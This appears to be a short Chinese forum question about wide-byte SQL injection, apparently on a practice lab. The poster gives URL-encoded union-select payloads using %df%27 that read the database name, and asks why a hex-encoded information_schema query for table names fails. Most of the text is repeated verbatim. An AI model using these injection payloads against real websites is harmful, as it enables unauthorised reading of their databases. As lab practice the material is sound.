首先能查到当前所在的数据库为:security
语句为:?id=1%df%27and%201=2%20union%20select%201,2,database()%23

然后就是查不到当前数据库有哪些表
语句为: id=1%df%27and%201=2%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x22736563757269747922%20limit%200,1%23
其中0x22736563757269747922就是数据库的16进制编码加上0x

我前后检查了很多遍都找不出原因来。
语句为:?id=1%df%27and%201=2%20union%20select%201,2,database()%23

然后就是查不到当前数据库有哪些表
语句为: id=1%df%27and%201=2%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x22736563757269747922%20limit%200,1%23
其中0x22736563757269747922就是数据库的16进制编码加上0x

我前后检查了很多遍都找不出原因来。